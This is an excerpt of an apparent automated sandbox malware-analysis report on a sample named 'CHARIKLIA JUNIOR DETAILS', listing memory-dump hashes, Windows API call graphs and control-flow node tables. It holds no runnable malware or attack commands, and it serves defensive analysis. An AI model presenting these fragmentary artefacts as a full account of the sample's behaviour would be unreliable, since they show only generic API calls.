                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 19417f5a45bcbf72721d98821a82f7e691e727ee644e3ea7c5ad332f15ed1727
                                                              • Instruction ID: b8da3b0e0836605d9d5f3c3444fca8846020f11c75bf29907c0a4101eed7d076
                                                              • Opcode Fuzzy Hash: 19417f5a45bcbf72721d98821a82f7e691e727ee644e3ea7c5ad332f15ed1727
                                                              • Instruction Fuzzy Hash: 25511670E142198BDB14DFA9C9856AEFBF2FF89205F248169D818A7315DB319D42CFA0
                                                              Function 05836918 Relevance: .1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7c8aadc55893ba39b53f3f246429fbb9cbef211b44aafcf948e02c4926cbf53
                                                              • Instruction ID: ed049160cf102b85be4600725b691c018b5b750e0588cb05a8a23f5867a738c6
                                                              • Opcode Fuzzy Hash: e7c8aadc55893ba39b53f3f246429fbb9cbef211b44aafcf948e02c4926cbf53
                                                              • Instruction Fuzzy Hash: E4511971E042199BDB14DFA9C5815AEFBF2BF89305F24C169D818AB315D7319D42CFA0
                                                              Function 05836D51 Relevance: .1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7f9c365cabd831ce1deed3137ef0700bfba98d5539079b22dbb030d18c02cc4
                                                              • Instruction ID: b05d21af7682b95e6e596d806b030dde27924f7f232d0b1d016f0cac318beed3
                                                              • Opcode Fuzzy Hash: d7f9c365cabd831ce1deed3137ef0700bfba98d5539079b22dbb030d18c02cc4
                                                              • Instruction Fuzzy Hash: D5513674E002198FDB14DFA9C6815AEBBF2BF89304F24816AD858AB315D7319D46CFA0

                                                              Execution Graph

                                                              Execution Coverage:10.6%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:95
                                                              Total number of Limit Nodes:10
                                                              execution_graph 40980 6de2878 40981 6de28be GetCurrentProcess 40980->40981 40983 6de2909 40981->40983 40984 6de2910 GetCurrentThread 40981->40984 40983->40984 40985 6de294d GetCurrentProcess 40984->40985 40986 6de2946 40984->40986 40987 6de2983 40985->40987 40986->40985 40988 6de29ab GetCurrentThreadId 40987->40988 40989 6de29dc 40988->40989 40997 149d030 40998 149d048 40997->40998 40999 149d0a2 40998->40999 41004 6ded2a8 40998->41004 41008 6dea4c4 40998->41008 41012 6ded297 40998->41012 41016 6dee3f8 40998->41016 41005 6ded2ce 41004->41005 41006 6dea4c4 CallWindowProcW 41005->41006 41007 6ded2ef 41006->41007 41007->40999 41009 6dea4cf 41008->41009 41011 6dee459 41009->41011 41020 6dea5ec CallWindowProcW 41009->41020 41013 6ded2a5 41012->41013 41014 6dea4c4 CallWindowProcW 41013->41014 41015 6ded2ef 41014->41015 41015->40999 41017 6dee408 41016->41017 41019 6dee459 41017->41019 41021 6dea5ec CallWindowProcW 41017->41021 41020->41011 41021->41019 40990 2f2eb38 40991 2f2eb7e GlobalMemoryStatusEx 40990->40991 40992 2f2ebae 40991->40992 41022 2f20848 41024 2f2084e 41022->41024 41023 2f2091b 41024->41023 41027 6de1b70 41024->41027 41031 6de1b60 41024->41031 41028 6de1b7f 41027->41028 41035 6de175c 41028->41035 41032 6de1b70 41031->41032 41033 6de175c GetModuleHandleW 41032->41033 41034 6de1ba0 41033->41034 41034->41024 41036 6de1767 41035->41036 41039 6de271c 41036->41039 41038 6de3126 41038->41038 41040 6de2727 41039->41040 41041 6de384c 41040->41041 41043 6de54e0 41040->41043 41041->41038 41044 6de5501 41043->41044 41045 6de5525 41044->41045 41047 6de5690 41044->41047 41045->41041 41049 6de569d 41047->41049 41048 6de56d6 41048->41045 41049->41048 41051 6de416c 41049->41051 41052 6de4177 41051->41052 41054 6de5748 41052->41054 41055 6de41a0 41052->41055 41054->41054 41056 6de41ab 41055->41056 41062 6de41b0 41056->41062 41058 6de57b7 41066 6deac40 41058->41066 41072 6deac58 41058->41072 41059 6de57f1 41059->41054 41065 6de41bb 41062->41065 41063 6de6bb8 41063->41058 41064 6de54e0 GetModuleHandleW 41064->41063 41065->41063 41065->41064 41068 6deac89 41066->41068 41069 6deacd5 41066->41069 41067 6deac95 41067->41059 41068->41067 41078 6deaed0 41068->41078 41081 6deaec0 41068->41081 41069->41059 41074 6deac89 41072->41074 41075 6deacd5 41072->41075 41073 6deac95 41073->41059 41074->41073 41076 6deaed0 GetModuleHandleW 41074->41076 41077 6deaec0 GetModuleHandleW 41074->41077 41075->41059 41076->41075 41077->41075 41084 6deaf10 41078->41084 41079 6deaeda 41079->41069 41082 6deaeda 41081->41082 41083 6deaf10 GetModuleHandleW 41081->41083 41082->41069 41083->41082 41086 6deaf15 41084->41086 41085 6deaf54 41085->41079 41086->41085 41087 6deb158 GetModuleHandleW 41086->41087 41088 6deb185 41087->41088 41088->41079 40993 6ded0f0 40994 6ded158 CreateWindowExW 40993->40994 40996 6ded214 40994->40996 41089 6de2ac0 DuplicateHandle 41090 6de2b56 41089->41090 41091 6def800 41092 6def830 41091->41092 41093 6def91c 41092->41093 41094 6def872 41092->41094 41095 6dea4c4 CallWindowProcW 41093->41095 41096 6def8ca CallWindowProcW 41094->41096 41097 6def879 41094->41097 41095->41097 41096->41097

                                                              Executed Functions

                                                              Function 06DF55A0 Relevance: 1.8, Strings: 1, Instructions: 600COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 666 6df55a0-6df55bd 667 6df55bf-6df55c2 666->667 668 6df55d8-6df55db 667->668 669 6df55c4-6df55cd 667->669 672 6df55dd-6df55f2 668->672 673 6df55f7-6df55fa 668->673 670 6df56a5-6df56ae 669->670 671 6df55d3 669->671 676 6df578a-6df57b3 670->676 677 6df56b4-6df56bf 670->677 671->668 672->673 674 6df55fc-6df5605 673->674 675 6df5606-6df5609 673->675 679 6df560b-6df560e 675->679 680 6df5615-6df561b 675->680 689 6df57bd-6df57c0 676->689 677->676 678 6df56c5-6df56d5 677->678 678->676 682 6df56db-6df56df 678->682 679->669 683 6df5610-6df5613 679->683 684 6df5621 680->684 685 6df5740-6df574e 680->685 687 6df56e4-6df56e7 682->687 683->680 688 6df5626-6df5629 683->688 684->688 690 6df5755-6df5758 685->690 691 6df56fd-6df5700 687->691 692 6df56e9-6df56f8 687->692 693 6df562b-6df562e 688->693 694 6df5633-6df5636 688->694 697 6df57ca-6df57cd 689->697 698 6df57c2-6df57c9 689->698 699 6df575d-6df5760 690->699 700 6df570e-6df5711 691->700 701 6df5702-6df5709 691->701 692->691 693->694 695 6df565a-6df565d 694->695 696 6df5638-6df5655 694->696 704 6df565f-6df566f 695->704 705 6df5674-6df5677 695->705 696->695 702 6df57ef-6df57f2 697->702 703 6df57cf-6df57d3 697->703 706 6df576a-6df576c 699->706 707 6df5762-6df5767 699->707 709 6df571e-6df5721 700->709 710 6df5713-6df5717 700->710 701->700 714 6df5814-6df5817 702->714 715 6df57f4-6df57f8 702->715 712 6df58aa-6df58e4 703->712 713 6df57d9-6df57e1 703->713 704->705 718 6df5679-6df567e 705->718 719 6df5685-6df5688 705->719 716 6df576e 706->716 717 6df5773-6df5776 706->717 707->706 722 6df572b-6df572e 709->722 723 6df5723-6df5726 709->723 720 6df577c-6df5789 710->720 721 6df5719 710->721 739 6df58e6-6df58e9 712->739 713->712 724 6df57e7-6df57ea 713->724 726 6df582f-6df5832 714->726 727 6df5819-6df582a 714->727 715->712 725 6df57fe-6df5806 715->725 716->717 717->667 717->720 718->693 731 6df5680 718->731 732 6df568a-6df569b 719->732 733 6df56a0-6df56a3 719->733 721->709 728 6df573b-6df573e 722->728 729 6df5730-6df5736 722->729 723->722 724->702 725->712 736 6df580c-6df580f 725->736 737 6df584c-6df584f 726->737 738 6df5834-6df5838 726->738 727->726 728->685 728->699 729->728 731->719 732->733 733->670 733->687 736->714 742 6df5851-6df585b 737->742 743 6df5860-6df5863 737->743 738->712 741 6df583a-6df5842 738->741 746 6df58eb-6df58f2 739->746 747 6df58f7-6df58fa 739->747 741->712 745 6df5844-6df5847 741->745 742->743 748 6df5865-6df586c 743->748 749 6df5873-6df5876 743->749 745->737 746->747 750 6df58fc-6df590d 747->750 751 6df5914-6df5917 747->751 753 6df586e 748->753 754 6df58a2-6df58a9 748->754 755 6df5878-6df587c 749->755 756 6df5890-6df5892 749->756 768 6df590f 750->768 769 6df5960-6df5973 750->769 758 6df5919-6df591e 751->758 759 6df5921-6df5924 751->759 753->749 755->712 757 6df587e-6df5886 755->757 760 6df5899-6df589c 756->760 761 6df5894 756->761 757->712 765 6df5888-6df588b 757->765 758->759 763 6df593e-6df5941 759->763 764 6df5926-6df5937 759->764 760->689 760->754 761->760 766 6df595b-6df595e 763->766 767 6df5943-6df5954 763->767 764->767 772 6df5939 764->772 765->756 766->769 771 6df5976-6df5979 766->771 767->746 777 6df5956 767->777 768->751 775 6df597b-6df5982 771->775 776 6df5987-6df598a 771->776 772->763 775->776 778 6df598c-6df599d 776->778 779 6df59a8-6df59ab 776->779 777->766 778->746 784 6df59a3 778->784 780 6df59ad-6df59b0 779->780 781 6df59b6-6df5b4a 779->781 780->781 783 6df5c96-6df5c99 780->783 815 6df5c80-6df5c93 781->815 816 6df5b50-6df5b57 781->816 785 6df5c9b-6df5cac 783->785 786 6df5cb7-6df5cba 783->786 784->779 785->746 793 6df5cb2 785->793 786->781 788 6df5cc0-6df5cc2 786->788 790 6df5cc9-6df5ccc 788->790 791 6df5cc4 788->791 790->739 794 6df5cd2-6df5cdb 790->794 791->790 793->786 817 6df5b5d-6df5b90 816->817 818 6df5c0b-6df5c12 816->818 829 6df5b95-6df5bd6 817->829 830 6df5b92 817->830 818->815 819 6df5c14-6df5c47 818->819 831 6df5c4c-6df5c79 819->831 832 6df5c49 819->832 840 6df5bee-6df5bf5 829->840 841 6df5bd8-6df5be9 829->841 830->829 831->794 832->831 843 6df5bfd-6df5bff 840->843 841->794 843->794
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $
                                                              • API String ID: 0-3993045852
                                                              • Opcode ID: cc52bf1fa63e87a06eddf1ca2aa4b169f6bdc8c0f52c6e4318f4a78c546109a9
                                                              • Instruction ID: a741c7e1493c67c7e88b0792ba87bfb646185f6b2e8bbd526f960bf8ac2e1b12
                                                              • Opcode Fuzzy Hash: cc52bf1fa63e87a06eddf1ca2aa4b169f6bdc8c0f52c6e4318f4a78c546109a9
                                                              • Instruction Fuzzy Hash: EC22D371F20215CFDF64DBA4E4406AEBBB2FF98320F25856AD905AB350DA31DC42CB90
                                                              Function 06DF2350 Relevance: 1.5, Instructions: 1496COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9924ec8e773ed3ebe8d9a78ab8ede04bae2f0de28f7da75e7c84a6543af29b8a
                                                              • Instruction ID: 504115a31c9304c53b19948b94ab2365bd52b50a49bfc4860c78aac03f243c7a
                                                              • Opcode Fuzzy Hash: 9924ec8e773ed3ebe8d9a78ab8ede04bae2f0de28f7da75e7c84a6543af29b8a
                                                              • Instruction Fuzzy Hash: 60D24A30E10209CFDB64DBA8C594A9DB7B2FF89310F56C5AAD509AB351DB35ED81CB80
                                                              Function 06DF65F0 Relevance: .8, Instructions: 826COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe71b0091461a0528252b358a502ef067bda87a277327e886655088e42f99c62
                                                              • Instruction ID: be167ca30713aa6d2f8c9cc2e12dbad61c283ac99b752d2b98d99dd0500d2cf4
                                                              • Opcode Fuzzy Hash: fe71b0091461a0528252b358a502ef067bda87a277327e886655088e42f99c62
                                                              • Instruction Fuzzy Hash: 82628C34B20249DFDB54DB68D984BADBBB2EF84310F158469E905EB790DB35EC42CB90
                                                              Function 06DFB248 Relevance: .8, Instructions: 765COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66fb9e9a695b28008445649404a2d30095e42b692e17f40fef9636d794a79df1
                                                              • Instruction ID: 2accbb8abc2f1d9de6bc47bb215bd615600052ed28f1d4b3626df0e147b92df4
                                                              • Opcode Fuzzy Hash: 66fb9e9a695b28008445649404a2d30095e42b692e17f40fef9636d794a79df1
                                                              • Instruction Fuzzy Hash: 34525D70E202098FEF64DB69D4847AEB7B2FB89310F25852AE505EB351DB35DC81CB91
                                                              Function 06DFC190 Relevance: .6, Instructions: 638COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3eec2836300e404c57920a867acc0177a89a09ed684bb749772adadd4c2744d5
                                                              • Instruction ID: 6ca02bbba1dbb37c7af6a2183ff4d4f5c44b43555df00b852ce0ee532fe0b0f2
                                                              • Opcode Fuzzy Hash: 3eec2836300e404c57920a867acc0177a89a09ed684bb749772adadd4c2744d5
                                                              • Instruction Fuzzy Hash: 52329074B202098FDF54DB68E884BAEB7B2FB88310F118525D905EB351DB35EC52CB91
                                                              Function 06DF7D80 Relevance: .5, Instructions: 476COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dfbe4bd3316972369dcec62a086cc15f9f90d8f3bd5360c038b6613653170a5a
                                                              • Instruction ID: 83301c4df2cee7545581c76bdc0689d9a0a62539f446c753aa7f54e93c9b8a5c
                                                              • Opcode Fuzzy Hash: dfbe4bd3316972369dcec62a086cc15f9f90d8f3bd5360c038b6613653170a5a
                                                              • Instruction Fuzzy Hash: 7502AD30B1121ACFDB54DB69E854AAEB7F2FF88210F118529D905DB350DB76EC82CB91
                                                              Function 06DE2872 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 06DE28F6
                                                              • GetCurrentThread.KERNEL32 ref: 06DE2933
                                                              • GetCurrentProcess.KERNEL32 ref: 06DE2970
                                                              • GetCurrentThreadId.KERNEL32 ref: 06DE29C9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: a7660d91497337970a7b4602b8b16c61e62bc28407479a1e07411ae2f10ddb58
                                                              • Instruction ID: 09e76945f1bce61a40de26addcd6e91e63785fd9be6868fe69c42eeb7b89ff70
                                                              • Opcode Fuzzy Hash: a7660d91497337970a7b4602b8b16c61e62bc28407479a1e07411ae2f10ddb58
                                                              • Instruction Fuzzy Hash: 865167B0901349CFDB44EFAAD948BAEBBF1BF88314F208419E409A73A0D7755944CF65
                                                              Function 06DE2878 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 06DE28F6
                                                              • GetCurrentThread.KERNEL32 ref: 06DE2933
                                                              • GetCurrentProcess.KERNEL32 ref: 06DE2970
                                                              • GetCurrentThreadId.KERNEL32 ref: 06DE29C9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 87f81d86737f67d27f19b68bf5a1564f41b373c302b6c32fc7ebbf86e325deee
                                                              • Instruction ID: bb37f34ebaf02e358572a8340d4ea27f777a37a902d165ee2f00d8ec4d0c7ff1
                                                              • Opcode Fuzzy Hash: 87f81d86737f67d27f19b68bf5a1564f41b373c302b6c32fc7ebbf86e325deee
                                                              • Instruction Fuzzy Hash: A05166B09013498FDB44EFAAD948B9EBBF5FF88314F208019E409A73A0DB756944CF65
                                                              Function 06DEAF10 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 844 6deaf10-6deaf2f 846 6deaf5b-6deaf5f 844->846 847 6deaf31-6deaf3e call 6dea2e4 844->847 849 6deaf73-6deafb4 846->849 850 6deaf61-6deaf6b 846->850 852 6deaf54 847->852 853 6deaf40 847->853 856 6deafb6-6deafbe 849->856 857 6deafc1-6deafcf 849->857 850->849 852->846 901 6deaf46 call 6deb1b8 853->901 902 6deaf46 call 6deb1a9 853->902 856->857 858 6deaff3-6deaff5 857->858 859 6deafd1-6deafd6 857->859 864 6deaff8-6deafff 858->864 861 6deafd8-6deafdf call 6dea2f0 859->861 862 6deafe1 859->862 860 6deaf4c-6deaf4e 860->852 863 6deb090-6deb150 860->863 866 6deafe3-6deaff1 861->866 862->866 896 6deb158-6deb183 GetModuleHandleW 863->896 897 6deb152-6deb155 863->897 867 6deb00c-6deb013 864->867 868 6deb001-6deb009 864->868 866->864 870 6deb015-6deb01d 867->870 871 6deb020-6deb029 call 6de348c 867->871 868->867 870->871 876 6deb02b-6deb033 871->876 877 6deb036-6deb03b 871->877 876->877 878 6deb03d-6deb044 877->878 879 6deb059-6deb066 877->879 878->879 881 6deb046-6deb056 call 6de8900 call 6dea300 878->881 886 6deb068-6deb086 879->886 887 6deb089-6deb08f 879->887 881->879 886->887 898 6deb18c-6deb1a0 896->898 899 6deb185-6deb18b 896->899 897->896 899->898 901->860 902->860
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 06DEB176
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 47d0a3d1887abee22388ad8f7e3a96e1f2e455346f7c2cee7d3eae1b4c6d9f23
                                                              • Instruction ID: 97e54688fc77aee86d3ad1ccf0731c72d22d50566c4b234ad0458907bfd4b9d9
                                                              • Opcode Fuzzy Hash: 47d0a3d1887abee22388ad8f7e3a96e1f2e455346f7c2cee7d3eae1b4c6d9f23
                                                              • Instruction Fuzzy Hash: 4E8168B0A00B068FD764EF6AD54475ABBF1FF88200F04892EE49AD7A50D775F845CBA1
                                                              Function 06DED0E4 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1003 6ded0e4-6ded156 1005 6ded158-6ded15e 1003->1005 1006 6ded161-6ded168 1003->1006 1005->1006 1007 6ded16a-6ded170 1006->1007 1008 6ded173-6ded1ab 1006->1008 1007->1008 1009 6ded1b3-6ded212 CreateWindowExW 1008->1009 1010 6ded21b-6ded253 1009->1010 1011 6ded214-6ded21a 1009->1011 1015 6ded255-6ded258 1010->1015 1016 6ded260 1010->1016 1011->1010 1015->1016 1017 6ded261 1016->1017 1017->1017
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06DED202
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 4e884979985a47efbded1fda4f402e0f1fb489c9cca32ce302468d7079fac372
                                                              • Instruction ID: be4af9ac9a12d8d666bd3341f56e770bb7617c32cf4bd312ed5145cf5e15df24
                                                              • Opcode Fuzzy Hash: 4e884979985a47efbded1fda4f402e0f1fb489c9cca32ce302468d7079fac372
                                                              • Instruction Fuzzy Hash: 4051C1B1D0034DDFDB14DFA9C884ADEBBB6BF88310F64812AE819AB210D7759945CF90
                                                              Function 06DED0F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1018 6ded0f0-6ded156 1019 6ded158-6ded15e 1018->1019 1020 6ded161-6ded168 1018->1020 1019->1020 1021 6ded16a-6ded170 1020->1021 1022 6ded173-6ded212 CreateWindowExW 1020->1022 1021->1022 1024 6ded21b-6ded253 1022->1024 1025 6ded214-6ded21a 1022->1025 1029 6ded255-6ded258 1024->1029 1030 6ded260 1024->1030 1025->1024 1029->1030 1031 6ded261 1030->1031 1031->1031
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06DED202
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 4377a61a5cc79efec04c64486e323e57092e07f6ef1c2f1470afc37d22ec6555
                                                              • Instruction ID: 2335327a95489f51134bb2c0e3d059c36d9d75ee159ca7af37d185cbcd029b0d
                                                              • Opcode Fuzzy Hash: 4377a61a5cc79efec04c64486e323e57092e07f6ef1c2f1470afc37d22ec6555
                                                              • Instruction Fuzzy Hash: 7B41B1B1D00309DFDB14DF99C884ADEBBB6BF88310F64812AE819AB250DB759845CF90
                                                              Function 06DEA5EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1032 6dea5ec-6def86c 1035 6def91c-6def93c call 6dea4c4 1032->1035 1036 6def872-6def877 1032->1036 1043 6def93f-6def94c 1035->1043 1038 6def8ca-6def902 CallWindowProcW 1036->1038 1039 6def879-6def8b0 1036->1039 1040 6def90b-6def91a 1038->1040 1041 6def904-6def90a 1038->1041 1046 6def8b9-6def8c8 1039->1046 1047 6def8b2-6def8b8 1039->1047 1040->1043 1041->1040 1046->1043 1047->1046
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 06DEF8F1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: 8ae5d2111546711de96032d313d15119b1f092de7e0934bf78432e0a8d1a5f8b
                                                              • Instruction ID: cfd3d022ed4fcd20bf194b6998d8a361422cddfe754a47c8a8d56dacea757b60
                                                              • Opcode Fuzzy Hash: 8ae5d2111546711de96032d313d15119b1f092de7e0934bf78432e0a8d1a5f8b
                                                              • Instruction Fuzzy Hash: 32415AB4900709DFDB54EF99C888AAABBF5FB88314F258459D459A7321D734A841CFA0
                                                              Function 06DE2AB8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1049 6de2ab8-6de2b54 DuplicateHandle 1050 6de2b5d-6de2b7a 1049->1050 1051 6de2b56-6de2b5c 1049->1051 1051->1050
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06DE2B47
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: ab8c04eecdd51c5855f863062a089435c2a9e1f4b22f0931da3df5acd449f435
                                                              • Instruction ID: 8f9249d1b6eac7b675daeb65b0ea4479c477330e22e06e15e3f64912c51a57ae
                                                              • Opcode Fuzzy Hash: ab8c04eecdd51c5855f863062a089435c2a9e1f4b22f0931da3df5acd449f435
                                                              • Instruction Fuzzy Hash: EF21E4B5D00249DFDB10CFAAD884ADEBBF5FB48310F14841AE914A7350D378A951CFA4
                                                              Function 06DE2AC0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1054 6de2ac0-6de2b54 DuplicateHandle 1055 6de2b5d-6de2b7a 1054->1055 1056 6de2b56-6de2b5c 1054->1056 1056->1055
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06DE2B47
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 2877829976bbca19def1c45ed576decf9bbe570896400fc658d20ecaf7792f3f
                                                              • Instruction ID: ad496f8e93b2ddfba1670c6aa69276febefc235effe03e11606eb10cbe5a01e5
                                                              • Opcode Fuzzy Hash: 2877829976bbca19def1c45ed576decf9bbe570896400fc658d20ecaf7792f3f
                                                              • Instruction Fuzzy Hash: F221E4B5D002099FDB10CFAAD884ADEFBF9FB48310F14801AE914A3350D378A940CFA4
                                                              Function 02F2EB1F Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
